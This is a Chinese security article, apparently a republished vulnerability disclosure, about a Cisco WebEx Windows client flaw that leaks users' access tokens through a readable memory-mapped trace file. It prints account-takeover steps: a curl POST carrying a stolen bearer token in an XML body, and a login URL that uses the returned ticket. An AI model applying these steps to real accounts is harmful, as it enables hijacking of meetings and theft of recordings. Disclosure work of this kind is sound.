Cisco WebEx是一个非常流行的视频会议解决方案。受疫情影响,用户明显增长。研究人员在WebEx中发现了一个严重的内存信息泄露漏洞。
研究人员在Cisco Webex Meetings Windows客户端40.4.12.8版本进行了测试。
应用安装后,会添加一个tray app,当用户登陆会启动trap app和一些依赖的进程。如果用户将客户端配置未自动登陆,那么就会进行如下的动作。
客户端有多个打开的内存映射文件,其中部分是受保护的,其他Windows 用户没有读写权限。其中有一个session为:
\Sessions\\BaseNamedObjects\WBXTRA_TRACE_FILE_EX
根据文件名,可以看出有一些痕迹信息。如果恶意用户可以登陆进入系统,那么就可以打开和复制文件的内容。简单来说,另一个用户可以在session之间循环,尝试打开、读取和保存想要的内容。
研究人员发现该文件中含有以下敏感信息:
登陆用的邮箱账号;
用来举办会议的URL。
当用户开始会议时,trace文件就会含有一个WebExAccessToken,允许任意用户模仿该用户和获取WebEx 账号的访问权限。
在PoC程序中,一旦受害者打开会议,复制的文件就会包含以下内容:
攻击者只需要从复制的文件中抓取Bearer token,并用在下面的HTTP POST请求中:
curl -d @get_token.xml -O https://homeabc.my.webex.com/WBXService/XMLService
get_token.xml文件内容如下所示:
<?xml version="1.0"?> <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <header> <securityContext> <webExID>user@host.name</webExID> <partnerID>PT</partnerID> <siteName>home-abc.my</siteName> <clientInfo>CiscoWebexMeetings-Win/40.6.2</clientInfo> <webExAccessToken> eyJhbGci... </webExAccessToken> </securityContext> </header> <body> <bodyContent xsi:type="java:com.webex.service.binding.user.GetLoginTicket"></bodyContent> </body> </serv:message>
会有一个一次性的登陆ticket作为响应:
下一步就是在浏览器中打开下面的URL 来控制受害者账号:
https://home-abc.my.webex.com//home-abc.my/mywebex/tool/frame/mywebexframe.php?MWAT=mw&strUserName=user%40host.name&TK=b30866fa388c26cf5efda0cd6dfee20b8a60163123bddcbfafb46c54700f2448&UTF8=1&SubMenu=PTPMR
红色的token来自于上面的SOAP 请求,该请求使用了复制的文件中的WebAccessToken:
攻击者利用泄露的信息可以从不同IP 地址的另外一个及其访问受害者账号。攻击者还可以看到室友的会议信息和参加口令,下载过去的会议记录等。下面是一个完整的攻击,PoC代码将在近日公布,PoC视频如下所示:
https://player.vimeo.com/video/430344704
在攻击场景中,任意的恶意本地用户或计算机上运行的恶意进程都可以监控登入token的内存映射文件。一旦发现token,泄露的信息就会被传递用于登陆到WebEx 账号、下载会议录制内容、查看和编辑会议等。研究人员建议用户尽快更新到 v40.6.0及更新版本。
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cisco-webex-memory-for-the-taking-cve-2020-3347/
本文作者:ang010ela
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/134177.html
必填 您当前尚未登录。 登录? 注册
必填(保密)